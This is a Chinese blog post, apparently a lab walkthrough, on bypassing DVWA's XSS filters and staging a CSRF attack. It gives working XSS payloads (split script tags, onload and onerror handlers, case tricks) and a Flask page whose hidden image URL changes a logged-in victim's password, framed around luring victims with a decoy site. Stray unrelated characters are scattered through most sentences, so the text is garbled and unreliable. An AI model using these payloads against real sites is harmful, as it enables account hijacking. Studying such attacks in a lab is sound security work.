XSS-CSRF的bvwa破解

A-XSS-Reflected

一刀森、XSS:(中級別)
  1. 測試payload:“<script>alert(“xss”)</script>”:測試結(jié)果:
image.png
  1. 發(fā)現(xiàn)輸入的<script>被去掉了枕屉,那么猜測是否后臺過濾了此標簽:進行第二步如下
    輸入Payload:“<scr<script>ipt>alert("xss")</script>”此設計是后臺假如去掉了中間的<script>,則兩邊的剛好又拼湊成一個完整的script標簽。所以這樣進行嘗試繞過:結(jié)果如下:被繞過:說明猜測正確:
image.png
二、XSS(高)

用先前的Payload“<scr<script>ipt>alert("xss")</script>”已經(jīng)不能進行注入,因為顯示結(jié)果如下:


image.png

2.則猜測可能后臺將所有的<script>字符都去除掉了睛榄。但是JS執(zhí)行的地方不只是只能通過<script>標簽,比如img的onerror屬性想帅,html的onload屬性场靴,分別用下面兩個payload測試:
(1)Payload: “<body onload=alert(/xss/)>”,如下:成功注入:


image.png

(2)Payload:“<img scr=’das’ onerror=alert(“XSS-HAHA”)>”,
image.png

A-XSS-Stored:

一.中級別:

1.測試是否對特殊字符有轉(zhuǎn)義或者過濾:輸入payload 如下:
Nmae: <'>"/ln; Messages: <liuning'/">, 結(jié)果如下圖:


image.png

可見,Name值沒有過濾港准,而messages值全部過濾掉了旨剥。則重點測試對象為name。
2.name輸入Payload如下:<script>alert(XSS-Stored)</script>,輸入如圖:

image.png

期間name框輸入長度不夠叉趣,更改代碼后輸入泞边,結(jié)果如下圖:


image.png

則推測后臺將script標簽過濾了,所以進行嘗試繞過:輸入Name字段為<scr<script>ipt>alert(“xssSSSS”)</script>, 發(fā)現(xiàn)沒有成功疗杉,可能是將拼湊的又過濾了阵谚,那么試試大寫:<Script>alert(/xss/)</script>蚕礼,成功破解:


image.png

,那么再次思考下梢什,可能其他的HTML事件屬性如onerror, onload奠蹬,onresize也沒有做過濾。測試onerror如下(Name的payload=<body onload=alert(/XSS_STORED/)>)成功入侵嗡午,
image.png
二.高級別:

測試onload事件是否做了過濾:
Name的Payload:<body onload=alert(/XSS_STORED-HIGH-LALA/)> 結(jié)果如下:

image.png

同樣囤躁,這個沒有過濾,說明此屬性沒有被過濾荔睹。那么再來測測是否對多有的script標簽進行了過濾:輸入payload如下:<Script>alert(/xss/)</script>狸演,結(jié)果如下,說明后臺對所有的script標簽都進行了過濾僻他、

image.png

B-CSRF-MIDDLE級別

1.在自己的機器上(這里為了方便宵距,也只是在本地的127.0.0.1上開了個4413端口進行模擬黑客服務器)。腳本如下:(命名為crsf.py)

# coding:utf-8
# author: chaser

from flask import *

app = Flask(__name__)

@app.route('/')
def scan_enter():
    return render_template('csrf1.html')

if __name__ == '__main__':
    app.run('127.0.0.1', port=4413, debug=True)
然后在templates目錄下放置頁面html: 命名為csrf1.html吨拗。
<!DOCTYPE html>
<html>
<head>
   <title>CSRF1</title>
</head>
<body>
   ![](http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=hacker_ln&password_conf=hacker_ln&Change=Change)
   <p>Wa!You are so cute!</p>
</body>
</html>

當受害者在沒有登出自己的dvwa程序時满哪,(保留有自己的登錄態(tài))突然瀏覽其他網(wǎng)站,比如某一個廣告的美女站點(我的站點可以模仿為充滿了美女的站點)劝篷,或者是我自己的博客網(wǎng)站哨鸭。當他點擊進來后,發(fā)現(xiàn)一個“Wa娇妓!You are so cute! ”(被贊美了像鸡,或者是在瀏覽我的正常的一個博客)那么此時CSRF已經(jīng)完成。因為我的頁面上有一個<img>標簽峡蟋,而標簽的src是一個鏈接坟桅,此鏈接的功能是修改這個受害人的admin密碼华望。(當然我事先要捕獲到這個修改密碼的鏈接)蕊蝗。當他沉浸在我站點的美女圖或者博文里時,自己的密碼已經(jīng)被我改了而不自知赖舟。哈哈蓬戚。如下:


image.png

點擊后(同一瀏覽器)的結(jié)果:


image.png

然后他返回到自己的被攻擊的站點中,這里是dvwa的站點宾抓。(或者我們可以做成將他跳轉(zhuǎn)回他來源的那個站點的主頁子漩,只需要在我們的惡意網(wǎng)址上添加代碼就可以)
setTimeout("javascript:location.href='127.0.0.1/dvwa/'", 5000); 這個是5秒后跳轉(zhuǎn)到主頁的方式。

當它退出后石洗,下次重新登錄就會發(fā)現(xiàn)登陸不進來幢泼,密碼錯誤。


image.png

而正確的密碼是hacker_ln:
image.png

成功登陸:
image.png
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末讲衫,一起剝皮案震驚了整個濱河市缕棵,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖招驴,帶你破解...
    沈念sama閱讀 206,723評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件篙程,死亡現(xiàn)場離奇詭異,居然都是意外死亡别厘,警方通過查閱死者的電腦和手機虱饿,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,485評論 2 382
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來触趴,“玉大人氮发,你說我怎么就攤上這事∪吲常” “怎么了折柠?”我有些...
    開封第一講書人閱讀 152,998評論 0 344
  • 文/不壞的土叔 我叫張陵,是天一觀的道長批狐。 經(jīng)常有香客問我扇售,道長,這世上最難降的妖魔是什么嚣艇? 我笑而不...
    開封第一講書人閱讀 55,323評論 1 279
  • 正文 為了忘掉前任承冰,我火速辦了婚禮,結(jié)果婚禮上食零,老公的妹妹穿的比我還像新娘困乒。我一直安慰自己,他們只是感情好贰谣,可當我...
    茶點故事閱讀 64,355評論 5 374
  • 文/花漫 我一把揭開白布娜搂。 她就那樣靜靜地躺著,像睡著了一般吱抚。 火紅的嫁衣襯著肌膚如雪百宇。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,079評論 1 285
  • 那天秘豹,我揣著相機與錄音携御,去河邊找鬼。 笑死既绕,一個胖子當著我的面吹牛啄刹,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播凄贩,決...
    沈念sama閱讀 38,389評論 3 400
  • 文/蒼蘭香墨 我猛地睜開眼誓军,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了疲扎?” 一聲冷哼從身側(cè)響起昵时,我...
    開封第一講書人閱讀 37,019評論 0 259
  • 序言:老撾萬榮一對情侶失蹤廓译,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后债查,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體非区,經(jīng)...
    沈念sama閱讀 43,519評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 35,971評論 2 325
  • 正文 我和宋清朗相戀三年盹廷,在試婚紗的時候發(fā)現(xiàn)自己被綠了征绸。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 38,100評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡俄占,死狀恐怖管怠,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情缸榄,我是刑警寧澤渤弛,帶...
    沈念sama閱讀 33,738評論 4 324
  • 正文 年R本政府宣布,位于F島的核電站甚带,受9級特大地震影響她肯,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜鹰贵,卻給世界環(huán)境...
    茶點故事閱讀 39,293評論 3 307
  • 文/蒙蒙 一晴氨、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧碉输,春花似錦籽前、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,289評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至阻荒,卻和暖如春挠锥,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背财松。 一陣腳步聲響...
    開封第一講書人閱讀 31,517評論 1 262
  • 我被黑心中介騙來泰國打工瘪贱, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人辆毡。 一個月前我還...
    沈念sama閱讀 45,547評論 2 354
  • 正文 我出身青樓,卻偏偏與公主長得像甜害,于是被迫代替她去往敵國和親舶掖。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 42,834評論 2 345

推薦閱讀更多精彩內(nèi)容

  • Spring Cloud為開發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見模式的工具(例如配置管理尔店,服務發(fā)現(xiàn)眨攘,斷路器主慰,智...
    卡卡羅2017閱讀 134,600評論 18 139
  • 之前積累了XSS 有一段時間,因為目前開始了一件有趣的工程鲫售,需要整合非常多的知識共螺,其中Web 安全這一塊出現(xiàn)最多的...
    刀背藏身閱讀 9,038評論 0 16
  • 基礎(chǔ) XSS就是讓瀏覽器執(zhí)行想插入的js。那么如何發(fā)現(xiàn)這些漏洞呢情竹?只要有輸入和輸出的地方都伴隨著漏洞的產(chǎn)生藐不,下面介...
    lotuslwb閱讀 996評論 0 0
  • 在那個年代,大家一般用拼接字符串的方式來構(gòu)造動態(tài) SQL 語句創(chuàng)建應用秦效,于是 SQL 注入成了很流行的攻擊方式雏蛮。在...
    Gundy_閱讀 552評論 0 5
  • 我挑秉,今年23歲,94年的苔货,也許是因為懶吧犀概,感覺索取任何東西都很麻煩,或者太安逸沒有想過會多么的痛苦的生活夜惭。這時候我...
    平凡的阿群閱讀 256評論 0 0